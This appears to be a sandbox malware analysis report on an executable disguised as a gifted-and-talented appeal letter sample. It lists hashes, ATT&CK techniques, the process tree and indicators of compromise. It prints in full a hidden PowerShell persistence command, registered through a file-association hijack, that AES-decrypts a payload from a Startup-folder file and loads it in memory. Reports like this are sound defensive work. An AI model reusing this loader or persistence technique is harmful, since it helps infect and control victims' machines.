39787d4b45d431380f24bb2c2e505ce1cd369ddc84629f295df892910d0d4e2e

General

Target

Gifted-And-Talented-Appeal-Letter-Sample (1).exe
Size

265.0MB
MD5

9113ce41a5c257d8fc3cd740bcb63c08
SHA1

b5a27bd5ef4349580f381e8dec5bd78ecfc9c542
SHA256

39787d4b45d431380f24bb2c2e505ce1cd369ddc84629f295df892910d0d4e2e
SHA512

8a44926c6a67b38481339d44d7665e771bfae2b58d71908a3d3c1783e0b814b1650bce9a06bb62bd334c8fa0a6eaec4d929e4625955749bee383d6651d87359b

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3236	Basiradial.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	Gifted-And-Talented-Appeal-Letter-Sample (1).exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\befeEPfFssicygMROJaPCXoiKOdkY.ZwMMyajvZTn	Gifted-And-Talented-Appeal-Letter-Sample (1).exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
3900	NETSTAT.EXE

Modifies registry class 7 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\aicdswchoprnktibu\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('PZ2z5Y3u0jdChqecGRWPr4ivKtZu3Z+hkY5hf1X8fOM=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxiZWZlRVBmRnNzaWN5Z01ST0phUENYb2lLT2RrWS5ad01NeWFqdlpUbg=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[SOYSDdMTA5MzSGO7kyKXM7CJhfH19qETaAs3weTq__MfajC9_zN6Bo3YXknellj7BoL_Yr.Db9v1dgJwoTx1sEzwPxo74Kt7UKHYzj6sRNbthoF]::U7u1m3V0ZwHV1ZZVOpYWmj();\""	Gifted-And-Talented-Appeal-Letter-Sample (1).exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\.zwmmyajvztn	Gifted-And-Talented-Appeal-Letter-Sample (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\.zwmmyajvztn\ = "aicdswchoprnktibu"	Gifted-And-Talented-Appeal-Letter-Sample (1).exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\aicdswchoprnktibu\shell\open\command	Gifted-And-Talented-Appeal-Letter-Sample (1).exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\aicdswchoprnktibu	Gifted-And-Talented-Appeal-Letter-Sample (1).exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\aicdswchoprnktibu\shell	Gifted-And-Talented-Appeal-Letter-Sample (1).exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\aicdswchoprnktibu\shell\open	Gifted-And-Talented-Appeal-Letter-Sample (1).exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4924	Gifted-And-Talented-Appeal-Letter-Sample (1).exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4924	Gifted-And-Talented-Appeal-Letter-Sample (1).exe
Token: SeDebugPrivilege	3900	NETSTAT.EXE

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 3236	2108	Gifted-And-Talented-Appeal-Letter-Sample (1).exe	86
PID 2108 wrote to memory of 3236	2108	Gifted-And-Talented-Appeal-Letter-Sample (1).exe	86
PID 2108 wrote to memory of 3236	2108	Gifted-And-Talented-Appeal-Letter-Sample (1).exe	86
PID 2108 wrote to memory of 4924	2108	Gifted-And-Talented-Appeal-Letter-Sample (1).exe	87
PID 2108 wrote to memory of 4924	2108	Gifted-And-Talented-Appeal-Letter-Sample (1).exe	87
PID 2280 wrote to memory of 3900	2280	cmd.exe	108
PID 2280 wrote to memory of 3900	2280	cmd.exe	108

C:\Users\Admin\AppData\Local\Temp\Gifted-And-Talented-Appeal-Letter-Sample (1).exe
"C:\Users\Admin\AppData\Local\Temp\Gifted-And-Talented-Appeal-Letter-Sample (1).exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Users\Admin\AppData\Local\Temp\Basiradial.exe
  "C:\Users\Admin\AppData\Local\Temp\Basiradial.exe"
  2⤵
  - Executes dropped EXE
  PID:3236
- C:\Users\Admin\AppData\Local\Temp\Gifted-And-Talented-Appeal-Letter-Sample (1).exe
  "C:\Users\Admin\AppData\Local\Temp\Gifted-And-Talented-Appeal-Letter-Sample (1).exe" /s
  2⤵
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4924

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1740

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\system32\NETSTAT.EXE
  netstat -a
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:3900

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Gifted-And-Talented-Appeal-Letter-Sample (1).exe.log

Filesize
425B

MD5
fff5cbccb6b31b40f834b8f4778a779a

SHA1
899ed0377e89f1ed434cfeecc5bc0163ebdf0454

SHA256
b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

SHA512
1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Basiradial.exe

Filesize
997KB

MD5
dbc534854dd385e59a3f1906ddfb9020

SHA1
2b3062d82232ce10a8713829199769ff0d12e0fc

SHA256
06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0

SHA512
1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

Download Submit
C:\Users\Admin\AppData\Local\Temp\Basiradial.exe

Filesize
997KB

MD5
dbc534854dd385e59a3f1906ddfb9020

SHA1
2b3062d82232ce10a8713829199769ff0d12e0fc

SHA256
06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0

SHA512
1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

Download Submit
memory/2108-131-0x00007FF902720000-0x00007FF9031E1000-memory.dmp

Filesize
10.8MB

Download
memory/2108-132-0x00007FF902720000-0x00007FF9031E1000-memory.dmp

Filesize
10.8MB

Download
memory/2108-130-0x0000019181300000-0x000001918158C000-memory.dmp

Filesize
2.5MB

Download
memory/2108-138-0x00007FF902720000-0x00007FF9031E1000-memory.dmp

Filesize
10.8MB

Download
memory/4924-139-0x00007FF902720000-0x00007FF9031E1000-memory.dmp

Filesize
10.8MB

Download
memory/4924-140-0x00007FF902720000-0x00007FF9031E1000-memory.dmp

Filesize
10.8MB

Download
memory/4924-141-0x000002943E620000-0x000002943E642000-memory.dmp

Filesize
136KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads